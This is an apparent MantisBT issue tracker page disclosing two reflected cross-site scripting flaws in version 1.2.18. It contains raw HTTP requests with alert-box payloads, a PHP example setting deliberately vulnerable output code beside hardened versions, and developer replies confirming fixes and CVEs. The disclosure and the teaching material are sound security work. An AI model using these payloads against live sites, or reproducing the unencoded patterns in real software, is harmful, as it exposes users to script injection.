View Issue Details

ID: 0019384
Project: mantisbt
Category: security
View Status: public
Last Update: 2015-03-25 17:50
Reporter: TWSpiders
Assigned To: atrol
Priority: normal
Severity: minor
Reproducibility: always
Status: closed
Resolution: no change required
Product Version: 1.2.18
Summary: 0019384: Multiple Cross-Site Scripting Vulnerabilities
Description

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page

The 'url' parameter of the /permalink_page.php page in MantisBT is vulnerable to cross-site scripting when JavaScript is supplied via a GET or POST request.
The exploitation example below uses the JavaScript "alert()" function to display the word "XSS".

Finding 2: Cross-Site Scripting Vulnerability in 'adm_config_report.php' page

The 'filter_config_id' parameter of the /adm_config_report.php page in MantisBT is vulnerable to cross-site scripting when JavaScript is supplied via a GET or POST request.
The exploitation example below uses the JavaScript "alert()" function to display the word "XSS".

Steps To Reproduce

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page

#Request:
GET /mantisbt/permalink_page.php?url=javascript:alert("XSS")// HTTP/1.1
Host: a.b.c.d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=v7ca97s16ee4o7p3a7esqne0t0; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=b8f1c62e064b83ba98bdb851209e58869db6d583519ec51485107cc05f718602; MANTIS_MANAGE_USERS_COOKIE=0%3Adate_created%3AASC%3A0
Connection: keep-alive

Finding 2: Cross-Site Scripting Vulnerability in 'adm_config_report.php' page

#Request:
POST /mantisbt/adm_config_report.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=r6nvbc7i6jsanrm8iuk063hm54; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=b8f1c62e064b83ba98bdb851209e58869db6d583519ec51485107cc05f718602
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://a.b.c.d/mantisbt/adm_config_report.php
Host: a.b.c.d
Content-Length: 147

save=1&filter_user_id=0&filter_project_id=0&filter_config_id=view_handler_threshold'/><script>alert("XSS")</script>&apply_filter_button=Apply+Filter

It is possible to inject 'view_handler_threshold'/><script>alert("XSS")</script>' as the value of the 'filter_config_id' parameter; the script is executed when the page loads in the user's browser.
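
Both findings share one root cause: an untrusted request parameter is written into an HTML attribute without encoding for that context, and in finding 1 the 'url' value is additionally never checked for a scheme such as javascript:. The PHP below is an added example written for this page, not MantisBT's own code. The page names, parameter names and the two payloads are taken from the report above; the rendering functions, the helper names and the allow-list rule for permalink URLs are assumptions made for the illustration. Each vulnerable pattern is shown beside a hardened form, and both of the report's payloads are run through both.

```php
<?php
// Added illustration of the two findings in this report; it is NOT MantisBT
// code. The page names, parameter names and payloads are taken from the
// report; the rendering functions, the helper names and the allow-list rule
// for permalink URLs are assumptions made for this example.

// Payloads exactly as supplied in the report's two requests.
const PAYLOAD_PERMALINK = 'javascript:alert("XSS")//';
const PAYLOAD_FILTER    = 'view_handler_threshold\'/><script>alert("XSS")</script>';

// Finding 1, vulnerable pattern: the 'url' parameter is written straight into
// an href, so a javascript: URL runs when the link is followed, and the quote
// in the payload breaks out of the attribute as well.
function permalink_vulnerable(string $url): string
{
    return '<a href="' . $url . '">' . $url . '</a>';
}

// Finding 1, hardened: accept only a same-site relative path (no scheme,
// no authority, no '//'), fall back to a fixed page otherwise (the thread
// says the fix for 0017648 yields a link to index.php), and HTML-encode
// whatever is finally written into the attribute.
function permalink_safe(string $url): string
{
    $is_relative = preg_match('#\A/?[A-Za-z0-9_./?=&%+\-]*\z#', $url) === 1
        && strpos($url, '//') === false;
    if (!$is_relative) {
        $url = 'index.php';
    }
    $enc = htmlspecialchars($url, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<a href="' . $enc . '">' . $enc . '</a>';
}

// Finding 2, vulnerable pattern: the submitted filter value is echoed back
// into the single-quoted value attribute of the filter form unencoded, so
// the '/> in the payload closes the input tag and a <script> element follows.
function filter_vulnerable(string $config_id): string
{
    return "<input type='text' name='filter_config_id' value='" . $config_id . "' />";
}

// Finding 2, hardened: encode for the HTML attribute context. ENT_QUOTES
// matters here: without it htmlspecialchars() leaves the single quote alone
// and a single-quoted attribute can still be broken open.
function filter_safe(string $config_id): string
{
    $enc = htmlspecialchars($config_id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<input type='text' name='filter_config_id' value='" . $enc . "' />";
}

// Crude regression check for the two payloads: rendered HTML must contain
// neither an injected script element nor a javascript: href.
function markup_is_broken(string $html): bool
{
    return stripos($html, '<script') !== false
        || stripos($html, 'href="javascript:') !== false;
}

$cases = [
    'permalink (vuln)' => permalink_vulnerable(PAYLOAD_PERMALINK),
    'permalink (safe)' => permalink_safe(PAYLOAD_PERMALINK),
    'filter (vuln)'    => filter_vulnerable(PAYLOAD_FILTER),
    'filter (safe)'    => filter_safe(PAYLOAD_FILTER),
];
foreach ($cases as $label => $html) {
    printf("%-17s %-6s %s\n", $label, markup_is_broken($html) ? 'BROKEN' : 'ok', $html);
}
```

Run it with `php xss_example.php`; the two "(vuln)" lines are reported BROKEN and the two "(safe)" lines ok. The allow-list is deliberately strict (relative paths drawn from a fixed character set); an application that has to accept absolute URLs should parse them and compare the host against a fixed list rather than rely on a deny-list of schemes, since deny-lists miss variants such as mixed case or embedded whitespace.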

Tags: No tags attached.
Attached Files
mantisBT_XSS.png (76,038 bytes)   

Relationships

related to 0011260 (closed, dhx): Attribute/XSS injection in permalink_page.php
related to 0019301 (closed, dregad): CVE-2015-2046 : XSS in adm_config_report.php (FG-VD-15-008)
related to 0017648 (closed, dregad): CVE-2014-6316: URL redirection issue
related to 0019493 (closed, dregad): CVE-2014-9701: XSS vulnerability in permalink_page.php

Activities

atrol

2015-02-20 02:24

developer   ~0048879

Finding 2: Cross-Site Scripting Vulnerability in 'adm_config_report.php' page
TWSpiders, could you please test whether this is fixed in the latest code? See 0019301.

atrol

2015-02-22 06:51

developer   ~0048885

Finding 1: Cross-Site Scripting Vulnerability in 'permalink_page.php' page
Not reproducible in 1.2.19 or master; you get a link to index.php, caused by the changes made to fix 0017648.

atrol

2015-02-22 06:54

developer   ~0048886

Last edited: 2015-03-10 16:14

TWSpiders, do you agree that we can close the issue, as your Finding 1 is fixed in the latest stable version 1.2.19 (fixed since 1.2.18) and your Finding 2 is fixed in the nightly builds of the stable branch and will be fixed in the next stable release, 1.2.20?

TWSpiders

2015-02-26 17:07

reporter   ~0048905

Thanks. Yes, please close the ticket.

TWSpiders

2015-03-03 15:31

reporter   ~0049134

Can you advise if you will be requesting a CVE for these findings?

dregad

2015-03-04 02:23

developer   ~0049135

@TWSpiders you will find the CVE numbers in the related (duplicate) issues, see the Relationships section above.

TWSpiders

2015-03-09 15:46

reporter   ~0049156

Can you point me to the CVE for finding 1? I do not see a CVE requested for this finding. Thanks!

atrol

2015-03-10 16:24

developer   ~0049164

TWSpiders, is there a special reason that you post private notes?
If not, I will set them to public.

Your finding 1 has been resolved in version 1.2.18 since the fix of bug 0017648, CVE-2014-6316.

If you want a CVE of its own for it, you can open a new issue for version 1.2.17, set it to resolved in version 1.2.18 and request a new CVE.

For future reports: please do not report more than one finding in one issue, as it makes it hard to follow up and impossible to assign CVEs 1:1 to issue IDs.